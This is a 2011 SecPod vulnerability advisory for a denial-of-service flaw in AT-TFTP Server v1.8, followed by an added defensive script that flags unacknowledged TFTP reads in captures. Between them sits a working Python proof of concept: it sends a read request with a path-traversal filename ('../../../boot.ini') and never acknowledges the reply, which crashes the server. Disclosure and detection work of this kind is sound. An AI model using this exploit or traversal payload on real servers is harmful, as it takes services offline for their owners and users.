Hi,

SecPod Research Team Member Antu Sanadi has found a DoS Vulnerability in
AT-TFTP Server. Advisory and POC details have been attached to this mail.

Regards,
SecPod Research Team
http://www.secpod.com

###############################################################################
AT-TFTP Server v1.8 Remote Denial of Service Vulnerability

SecPod Technologies (www.secpod.com)
Author: Antu Sanadi
###############################################################################

SecPod ID: 1013        01/04/2011 Issue Discovered
                       04/04/2011 Vendor Notified
                       No Response from the Vendor
                       25/04/2011 Advisory Released

Class: Denial of Service        Severity: High

Overview:
---------
AT-TFTP Server v1.8 is prone to a remote Denial of Service vulnerability
as it fails to handle 'read' requests from the client properly.

Technical Description:
----------------------
The vulnerability is caused by an error in the "TFTPD.EXE" which causes
the server to crash when no acknowledgement response is sent back to the
server after a successful 'read'.

Impact:
--------
Successful exploitation could allow an attacker to crash a vulnerable server.

Affected Software:
------------------
AT-TFTP Server version 1.8

Tested on,
AT-TFTP Server version 1.8 on Windows XP SP3

References:
-----------
http://secpod.org/blog/?p=194
http://www.alliedtelesis.co.nz/
http://secpod.org/SecPod_AT_TFTP_DoS-POC.py
http://secpod.org/advisories/SecPod_AT_TFTP_DoS.txt

Proof of Concept:
----------------
http://secpod.org/blog/?p=194
http://secpod.org/SecPod_AT_TFTP_DoS-POC.py

Solution:
----------
Not available

Risk Factor:
-------------
    CVSS Score Report:
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = LOW
        AUTHENTICATION         = NONE
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = NONE
        AVAILABILITY_IMPACT    = COMPLETE
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 7.8 (High) (AV:N/AC:L/Au:N/C:N/I:N/A:C)

Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of
this vulnerability.

#!/usr/bin/python
##############################################################################
# Exploit   : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
#             http://secpod.org/wintftp_dos_poc.py
# Reference :
# Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################

import socket
import sys

host = '127.0.0.1'
port = 69

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

addr = (host,port)

# TFTP read request (opcode 0x0001): filename "../../../boot.ini", mode "netascii".
# The script sends the request and never acknowledges the server's reply.
data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
      '\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, (host, port))
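
For defenders, the condition named in the Technical Description (a 'read' whose data is never acknowledged) can be looked for in captured TFTP traffic. The following is an added example, not part of the SecPod advisory or PoC; the function names, addresses and sample packets are constructed for illustration and assume packets already decoded to (source, destination, UDP payload).

```python
import struct

RRQ, DATA, ACK = 1, 3, 4  # TFTP opcodes from RFC 1350

def parse_tftp(payload):
    """Return (opcode, fields) for a TFTP payload, or None if it is malformed."""
    if len(payload) < 4:
        return None
    (op,) = struct.unpack("!H", payload[:2])
    if op == RRQ:
        parts = payload[2:].split(b"\x00")
        if len(parts) < 3:          # need filename NUL mode NUL
            return None
        return op, {"file": parts[0].decode("ascii", "replace")}
    if op in (DATA, ACK):
        return op, {"block": struct.unpack("!H", payload[2:4])[0]}
    return op, {}

def unacked_reads(packets, server_port=69):
    """packets: iterable of (src, dst, payload); src and dst are (ip, port).
    Returns the read sessions where the server sent DATA and the client never ACKed."""
    sessions = {}
    for src, dst, payload in packets:
        parsed = parse_tftp(payload)
        if parsed is None:
            continue
        op, fields = parsed
        if op == RRQ and dst[1] == server_port:
            sessions[src] = {"client": src, "file": fields["file"], "data": 0, "acks": 0}
        elif op == DATA and dst in sessions:
            sessions[dst]["data"] += 1      # counts retransmissions too
        elif op == ACK and src in sessions:
            sessions[src]["acks"] += 1
    return [dict(s, traversal=".." in s["file"].replace("\\", "/").split("/"))
            for s in sessions.values() if s["data"] and not s["acks"]]

# Constructed sample capture (not real traffic): client A completes a read,
# client B requests a file and never acknowledges block 1.
SRV = "192.0.2.10"
A, B = ("198.51.100.5", 40001), ("198.51.100.9", 40002)
SAMPLE = [
    (A, (SRV, 69), b"\x00\x01config.bin\x00octet\x00"),
    ((SRV, 1025), A, b"\x00\x03\x00\x01" + b"x" * 100),
    (A, (SRV, 1025), b"\x00\x04\x00\x01"),
    (B, (SRV, 69), b"\x00\x01../../../boot.ini\x00netascii\x00"),
    ((SRV, 1026), B, b"\x00\x03\x00\x01" + b"y" * 100),
    ((SRV, 1026), B, b"\x00\x03\x00\x01" + b"y" * 100),  # retransmit, still no ACK
]

if __name__ == "__main__":
    for finding in unacked_reads(SAMPLE):
        print(finding)
```

A lost ACK or a client that went away produces the same pattern, so a finding is a lead to correlate with a TFTPD.EXE crash on the server, not proof on its own.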